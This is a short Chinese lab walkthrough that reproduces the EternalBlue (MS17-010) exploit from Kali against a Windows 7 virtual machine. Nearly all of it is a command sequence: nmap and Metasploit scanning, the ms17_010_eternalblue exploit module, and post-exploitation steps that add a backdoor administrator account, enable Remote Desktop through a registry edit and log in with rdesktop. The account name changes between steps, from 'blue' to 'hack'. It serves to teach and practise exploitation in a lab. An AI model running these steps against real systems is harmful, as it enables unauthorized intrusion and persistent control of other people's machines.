永恒之蓝MS17-010漏洞复现

一、

攻击机：kaili系统

靶机：win7系统

首先用nmap扫描目标主机是否开启445端口

 

 

在kali开启msfconsole的smb模块扫描输入：use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.80.134（目标主机ip）

然后直接run

 

 

出现Host is likely VULNERABLE to MS17-010! （表示有这个漏洞）

 

 

二、使用模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue

 set RHOST 192.168.80.134

 

 查看设置选项：show options

 

开始攻击：exploit或run

 

 攻击成功

三、通过sheel对靶机进行远程打开电脑桌面进行控制

1、首先创建用户名和密码

net user blue blue /add

 

 

2、将用户hack添加入管理组 

net localgroup administrators hack /add

 

 

3、

开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

 

 

4、打开Kali远程桌面连接Win7 

rdesktop 192.168.80.134:3389

 

 

 5、输入创建的hack用户登陆成功